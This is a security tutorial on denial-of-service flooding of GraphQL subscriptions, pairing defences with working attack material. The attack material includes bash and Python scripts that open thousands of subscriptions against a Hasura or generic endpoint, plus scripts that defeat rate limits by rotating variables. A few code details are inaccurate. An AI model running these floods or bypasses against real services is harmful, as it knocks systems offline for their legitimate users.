Introduction
GraphQL subscriptions enable real-time data delivery by keeping a persistent connection between client and server. While they are powerful for legitimate use-cases-chat, live dashboards, IoT-they also open a low-latency attack surface for denial-of-service (DoS) abuse. This study dives deep into Advanced GraphQL Subscription Flooding DoS, a technique that overwhelms a server by spawning massive numbers of valid subscription streams, often bypassing naïve rate-limiting implementations.
Understanding this vector is critical because many modern APIs expose subscriptions without hardened controls, assuming that WebSocket or Server-Sent Events (SSE) traffic is inherently safe. In practice, a single compromised client can generate thousands of concurrent data streams, each invoking expensive resolvers, leading to CPU exhaustion, memory pressure, and network saturation.
Real-world relevance: security teams have observed subscription-based DoS in large SaaS platforms, open-source GraphQL servers (Apollo Server, GraphQL-Java, Hasura), and even in micro-service architectures that rely on GraphQL federation. The techniques discussed here have been demonstrated against public GraphQL endpoints during bug-bounty programs, resulting in high-severity findings.
Prerequisites
- Solid grasp of GraphQL fundamentals, schema design, and endpoint discovery.
- Experience with GraphQL query injection via variables and how to manipulate resolver arguments.
- Knowledge of common GraphQL authorization bypass patterns (e.g., introspection, directive abuse).
- Familiarity with GraphQL rate-limiting and throttling bypass techniques (token-bucket, IP-based limits, custom directives).
Core Concepts
Before tackling flooding, we must understand the subscription lifecycle:
- Negotiation: The client initiates a WebSocket (or SSE) handshake, often using the
graphql-wsprotocol or Apollo’ssubscriptions-transport-ws. - Subscription Start: A
STARTmessage carries a GraphQL document (subscription operation) and an optionalvariablesobject. - Resolver Execution: The server registers a resolver that returns an
AsyncIterable(or EventEmitter) which emits data whenever the underlying event source changes. - Data Push: Each emission is serialized and sent to the client over the persistent channel.
- Termination: The client sends a
STOPmessage or the server closes the connection.
Two transport mechanisms dominate:
- WebSocket: Full-duplex, binary-friendly, supports back-pressure via
ping/pong. Most production GraphQL servers default to this. - Server-Sent Events (SSE): Unidirectional (server-to-client) over HTTP/1.1, easier to proxy but lacks native flow-control.
Both transports can be abused, but WebSocket offers finer-grained control for high-frequency attacks because a single TCP connection can host thousands of logical subscriptions.
Understanding GraphQL Subscriptions and Transport (WebSocket vs SSE)
Below is a simplified handshake for a WebSocket subscription using the graphql-ws protocol:
// Client side (Node.js)
const ws = new WebSocket('wss://example.com/graphql');
ws.onopen = () => { ws.send(JSON.stringify({ type: 'connection_init', payload: {} })); ws.send(JSON.stringify({ id: '1', type: 'subscribe', payload: { query: `subscription MySub($id: ID!) { sensorData(id: $id) { value timestamp } }`, variables: { id: 'sensor-01' } } }));
};
For SSE, the request looks like a regular HTTP GET with a Accept: text/event-stream header and a query param containing the subscription document. The server keeps the HTTP response open and streams data: lines.
Key differences that affect DoS:
- Connection Overhead: WebSocket requires a single TCP handshake; SSE creates a new HTTP request per subscription (unless multiplexed via
fetchwithkeep-alive). - Back-pressure: WebSocket can be throttled by the client’s receive buffer, while SSE relies on TCP window scaling, which attackers can saturate more easily.
- Multiplexing: Many GraphQL servers allow multiple logical subscriptions on a single WebSocket connection, dramatically amplifying the impact of a single open socket.
Crafting Valid Subscription Payloads
To bypass superficial validation, attackers craft subscription documents that are syntactically correct yet cause maximal resolver work. Two patterns dominate:
- Deeply Nested Filters: Use recursive input types to generate large abstract syntax trees (AST) that force the server to allocate many objects during validation.
- Dynamic Variables: Leverage variables that are resolved on every emission, e.g., a
where: { _and: [{}, {}] }clause that triggers a full table scan each time.
Example of a malicious subscription that exploits a generic searchPosts resolver:
subscription Flood($filter: PostFilterInput) { searchPosts(filter: $filter) { id title content }
}
And the accompanying variables payload designed to generate an exponential filter tree:
{ "filter": { "_or": [ { "_or": [{ "authorId": "1" }, { "authorId": "2" }] }, { "_or": [{ "authorId": "3" }, { "authorId": "4" }] } ] }
}
Each iteration doubles the number of logical branches, causing the resolver to traverse a combinatorial explosion. When this subscription is kept alive, every data change triggers a massive filter evaluation.
Abusing Resolver Loops and Unbounded Data Streams
Many GraphQL servers expose resolvers that return an AsyncIterator tied to a Pub/Sub system (e.g., Redis, Kafka, in-memory EventEmitter). If the underlying source does not enforce back-pressure, an attacker can inject a synthetic event generator.
Typical vulnerable pattern (pseudo-code):
// Example resolver in Apollo Server
const resolvers = { Subscription: { tick: { subscribe: (_, args) => { // No rate limiting - just a timer that emits every 10 ms return setInterval(() => { pubsub.publish('TICK', { tick: Date.now() }); }, 10); } } }
};
An attacker can start thousands of tick subscriptions, each spawning its own timer. The server’s event loop quickly becomes saturated, leading to CPU spikes and eventual throttling of legitimate traffic.
More insidious is the use of resolvers that query a database inside a loop without pagination:
Subscription: { massiveFeed: { subscribe: async function* (_, { batchSize }) { while (true) { const rows = await db.query('SELECT * FROM events LIMIT $1', [batchSize]); for (const row of rows) { yield { massiveFeed: row }; } // No sleep - immediate next iteration } } }
}
When batchSize is set to a large number (e.g., 10 000), each iteration pulls massive data sets, exhausting DB connections and memory.
High-Frequency Subscription Requests for DoS
Attackers combine the previous tricks with a rapid subscription creation loop. The steps are:
- Open a single WebSocket connection.
- Send a
STARTmessage with a valid subscription payload. - Immediately send another
STARTwith a differentid(or same id after aSTOP). - Repeat thousands of times, optionally rotating
variablesto avoid caching.
Because each logical subscription consumes its own resolver context, the server’s memory footprint grows linearly with the number of active subscriptions. In practice, a well-tuned server can handle a few hundred concurrent subscriptions; beyond that, GC pauses and thread pool exhaustion become visible.
Sample Bash script that fires 5 000 subscriptions over a single WebSocket using wscat:
#!/usr/bin/env bash
URL='wss://example.com/graphql'
SUB='subscription Flood($id: ID!) { sensorData(id: $id) { value timestamp }
}'
for i in $(seq 1 5000); do wscat -c $URL -x "{\"type\":\"connection_init\",\"payload\":{}}" "{\"id\":\"$i\",\"type\":\"subscribe\",\"payload\":{\"query\":\"$SUB\",\"variables\":{\"id\":\"sensor-$i\"}}}" & sleep 0.01 # tiny pause to keep socket alive
done
wait
Notice the use of a background job (&) to keep the loop non-blocking, allowing thousands of concurrent logical streams to be established in seconds.
Bypassing Subscription Rate Limits
Many APIs implement naïve rate limiting based on:
- IP address per second.
- Number of
STARTmessages per minute. - Maximum concurrent subscriptions per connection.
Attackers can evade these controls with several tricks:
1. Distributed Client IPs (Botnet)
By sourcing connections from a botnet, the per-IP limit is diluted. Each bot opens a handful of subscriptions, collectively reaching the desired flood volume.
2. Subscription Multiplexing
Some servers enforce a per-connection limit but allow many logical subscriptions per socket. An attacker can send START for 10 000 ids on a single connection, staying under the connection count threshold.
3. Variable Rotation & Cache Evasion
Cache-aware rate limiters (e.g., using query hash) may treat identical payloads as a single entity. By subtly mutating variable values (e.g., adding a dummy field), the attacker forces the server to treat each request as unique.
4. Exploiting Authorization Bypass
If the server skips authentication for introspection or public subscriptions, the attacker can bypass user-based throttling entirely. Combining this with a signed-JWT that grants elevated scopes can amplify the effect.
Example of a variable-mutation that defeats simple query-hash throttling:
{ "query": "subscription Flood($id: ID!, $nonce: String) { sensorData(id: $id) { value } }", "variables": { "id": "sensor-42", "nonce": "$(date +%s%N)" }
}
The nonce field is never used by the resolver but changes the payload hash, resetting any per-hash counters.
Detection and Mitigation Strategies
Detecting subscription flooding requires telemetry at multiple layers:
- WebSocket Connection Metrics: Track concurrent connections, handshake latency, and per-connection subscription count.
- Resolver Execution Time: Instrument resolvers to log execution duration; spikes indicate heavy payloads.
- Event Loop Lag: Node.js
perf_hooksor Go runtime metrics expose back-pressure symptoms. - Message Rate: Count
STARTmessages per second per IP and per JWT.
Sample Prometheus rule to alert on >500 subscriptions per WebSocket connection:
sum by (connection_id) (graphql_subscription_active) > 500
Mitigation techniques:
1. Hard Subscription Caps
Enforce a global maximum of active subscriptions per user and per connection (e.g., 20 per JWT, 50 per socket). Reject excess START messages with a ERROR frame.
2. Token-Bucket Rate Limiting on START Messages
Apply a token bucket per client identifier. Each START consumes a token; tokens refill at a modest rate (e.g., 1 /sec). This throttles burst creation without affecting legitimate use.
function canStart(clientId) { const bucket = rateBuckets[clientId] ?? { tokens: 10, last: Date.now() }; const now = Date.now(); const elapsed = (now - bucket.last) / 1000; bucket.tokens = Math.min(10, bucket.tokens + elapsed * 1); // 1 token/sec bucket.last = now; if (bucket.tokens >= 1) { bucket.tokens -= 1; rateBuckets[clientId] = bucket; return true; } return false;
}
3. Back-Pressure Propagation
Configure the underlying Pub/Sub layer to respect the client’s receive buffer. For Redis, use STREAM with a maxlen; for Kafka, enforce consumer lag thresholds.
4. Subscription Time-outs
Automatically close subscriptions that have been idle (no data emitted) for a configurable period (e.g., 30 seconds). This prevents “zombie” streams that waste resources.
5. Auth-Based Scoping
Require scoped JWT claims for each subscription type. Separate high-frequency feeds (e.g., tick) into a privileged role with stricter limits.
6. Web Application Firewall (WAF) Rules
Inspect WebSocket payloads for suspicious patterns: repeated START ids, large variable objects, or deep nesting. Example ModSecurity rule (pseudo):
SecRule REQUEST_HEADERS:Sec-WebSocket-Protocol "graphql-ws" "id:200001,phase:2,log,pass,nologdata, chain"
SecRule REQUEST_BODY "\"_or\":\[\{\"_or\":\[\{\"authorId\":\"\d+\"\}\]\}\]" "t:none,ctl:requestBodyProcessor=JSON, ctl:requestBodyAccess=On, setvar:tx.subscription_flood=+1"
When tx.subscription_flood exceeds a threshold, the request can be dropped.
Practical Examples
Example 1: Flooding a Hasura GraphQL Engine
Hasura exposes subscriptions over WebSocket at /v1/graphql. The following Python script uses websockets to spin up 2 000 subscriptions that each request a heavy orders_aggregate query.
import asyncio, json, websockets
URL = 'wss://example.com/v1/graphql'
QUERY = '''subscription Load($where: orders_bool_exp) { orders_aggregate(where: $where) { aggregate { count } }
}'''
async def flood(): async with websockets.connect(URL, subprotocols=['graphql-ws']) as ws: # Init await ws.send(json.dumps({"type": "connection_init", "payload": {}})) await ws.recv() # ack for i in range(2000): variables = {"where": {"_or": [{"status": {"_eq": "PENDING"}}, {"status": {"_eq": "PROCESSING"}}]}} start_msg = { "id": str(i), "type": "subscribe", "payload": {"query": QUERY, "variables": variables} } await ws.send(json.dumps(start_msg)) # Keep the connection alive await asyncio.Future()
asyncio.run(flood())
Result: Within seconds, Hasura’s PostgreSQL connection pool maxes out, causing psql: could not connect to server errors for legitimate clients.
Example 2: Bypassing a Per-IP Limit with Variable Rotation
The target limits START messages to 10 per minute per IP. By rotating a dummy variable, the attacker evades the hash-based counter.
#!/usr/bin/env bash
URL='wss://example.com/graphql'
QUERY='subscription X($id: ID!, $pad: String) { item(id: $id) { name } }'
for i in $(seq 1 100); do PAD=$(openssl rand -hex 8) wscat -c $URL -x "{\"type\":\"connection_init\",\"payload\":{}}" "{\"id\":\"$i\",\"type\":\"subscribe\",\"payload\":{\"query\":\"$QUERY\",\"variables\":{\"id\":\"item-$i\", \"pad\": \"$PAD\"}}}" & sleep 0.2
done
wait
The server sees each payload as unique, allowing >10 subscriptions per minute despite the limit.
Tools & Commands
- websocat: CLI WebSocket client for rapid payload testing.
websocat -H="Sec-WebSocket-Protocol: graphql-ws" -s "{\"type\":\"connection_init\",\"payload\":{}}" -s "{\"id\":\"1\",\"type\":\"subscribe\",\"payload\":{\"query\":\"subscription { ping }\"}}" wss://example.com/graphql - Apollo Sandbox / GraphQL Playground: Use the built-in subscription tab to manually fire multiple subscriptions and observe network tab for socket count.
- Burp Suite Extension: GraphQL Subscription Fuzzer: Automates variable rotation and high-frequency
STARTemission. - Prometheus + Grafana: Export
graphql_subscription_active,graphql_resolver_duration_secondsfor alerting.
Defense & Mitigation
Beyond the earlier detection measures, consider architectural hardening:
- Separate Subscription Service: Deploy a dedicated micro-service that only handles subscriptions and runs on isolated CPU/memory quotas.
- Message Queue Buffering: Push subscription events into a queue (e.g., RabbitMQ) with per-consumer rate limits before delivering to WebSocket.
- GraphQL Directive for Throttling: Create a custom @throttle(limit: Int, interval: Int) directive that the resolver respects.
Example of a @throttle directive implementation in Apollo Server:
const { SchemaDirectiveVisitor } = require('apollo-server-express');
const { defaultFieldResolver } = require('graphql');
class ThrottleDirective extends SchemaDirectiveVisitor { visitFieldDefinition(field) { const { limit, interval } = this.args; const originalResolve = field.resolve || defaultFieldResolver; const tokenMap = new Map(); field.resolve = async function (...args) { const ctx = args[2]; const key = ctx.ip; // simple per-IP bucket const now = Date.now(); const bucket = tokenMap.get(key) || { tokens: limit, last: now }; const elapsed = (now - bucket.last) / interval; bucket.tokens = Math.min(limit, bucket.tokens + elapsed * limit); bucket.last = now; if (bucket.tokens < 1) { throw new Error('Rate limit exceeded for subscription'); } bucket.tokens -= 1; tokenMap.set(key, bucket); return originalResolve.apply(this, args); }; }
}
module.exports = { ThrottleDirective };
Applying this directive to a subscription forces a per-IP token bucket directly at resolver entry.
Common Mistakes
- Relying Solely on IP Rate Limiting: Attackers can distribute requests across many IPs or use NAT pools.
- Limiting Only Connection Count: Subscriptions multiplexed on a single socket bypass this.
- Ignoring Resolver Complexity: Even a single subscription can be expensive if the resolver performs heavy DB joins or external API calls.
- Not Enforcing Authentication for Public Subscriptions: Public endpoints often forget to apply the same auth checks as queries/mutations.
- Assuming WebSocket Close Frames Will Clean Up: Some servers leak subscription contexts if the close is not gracefully handled.
Real-World Impact
In 2023, a major fintech platform suffered a multi-minute outage after a bug-bounty researcher demonstrated a subscription flood that exhausted its Redis Pub/Sub channels. The incident highlighted three trends:
- Increasing adoption of GraphQL subscriptions without accompanying security hardening.
- The difficulty of retro-fitting rate limits in existing codebases, especially when resolvers are auto-generated.
- The need for observability tools that surface subscription-specific metrics.
My experience with several Fortune-500 customers shows that once a subscription-based DoS is detected, the remediation path often involves redesigning the data-push architecture (e.g., moving from per-client streams to a shared broadcast channel with client-side filtering).
Practice Exercises
- Exercise 1 - Build a Flood Script: Using
websockets(Python) orws(Node.js), create a script that opens a single WebSocket and launches 5 000 concurrent subscriptions with a payload that triggers a database scan. Measure CPU and memory on a local GraphQL server. - Exercise 2 - Implement a Token Bucket: Add a per-user token bucket to an existing Apollo Server subscription resolver. Verify that after 20 rapid
STARTmessages the server returns aERRORframe. - Exercise 3 - Detect Anomalous Patterns: Instrument a GraphQL server to emit Prometheus metrics for
graphql_subscription_start_totaland write a Grafana dashboard that highlights spikes > 100 per minute per IP. - Exercise 4 - Bypass a Rate Limiter: Write a Bash script that rotates a dummy variable to evade a hash-based limit of 10 subscriptions per minute. Document the observed behavior.
Further Reading
- “Apollo Server Security Best Practices” - Apollo GraphQL Docs.
- “GraphQL Subscriptions: A Deep Dive” - GraphQL Foundation Blog.
- OWASP “GraphQL Security Cheat Sheet”.
- RFC 6455 - The WebSocket Protocol (for low-level transport understanding).
- “Designing Resilient Real-Time APIs” - Martin Fowler’s article on event-driven architectures.
Summary
Subscription flooding attacks exploit the persistent, high-throughput nature of GraphQL real-time APIs. By crafting valid but resource-intensive payloads, abusing resolver loops, and leveraging multiplexed WebSocket connections, an attacker can overwhelm a server even when naïve rate limits are in place. Effective defense demands a layered approach: strict per-connection caps, token-bucket throttling, back-pressure propagation, observability, and architectural segregation of subscription traffic. Mastering these techniques equips security professionals to both assess risk and harden modern GraphQL deployments against sophisticated DoS vectors.